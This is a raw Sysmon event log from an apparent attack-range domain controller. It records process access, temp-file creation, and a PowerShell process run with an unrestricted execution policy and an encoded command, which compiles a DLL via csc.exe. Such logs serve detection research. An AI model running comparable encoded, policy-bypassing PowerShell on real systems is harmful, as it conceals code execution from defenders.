11:59:59.591{266CAFBE-643F-6064-D302-00000000AD01}40401568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.595{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 
"/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESCC40.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC256FC59F54DB41CB8ECA1DDFF829C17D.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\j15iut5x.cmdline" 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.497{266CAFBE-643E-6064-D102-00000000AD01}16042728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d8ed2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d894a|UNKNOWN(00007FF893A6BB0F) 154100x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.500{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 
@"C:\Users\ADMINI~1\AppData\Local\Temp\j15iut5x.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 23542300x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FFAA91A396C09501E37F90A043FAE8A5,SHA256=88A675CBBCBD086EBE6A47585E8C09658D0149FF8A69C8C1E036C125EE8A5221,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.cmdline2021-03-31 11:59:59.497 11241100x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:59.497{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dll2021-03-31 11:59:59.497 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 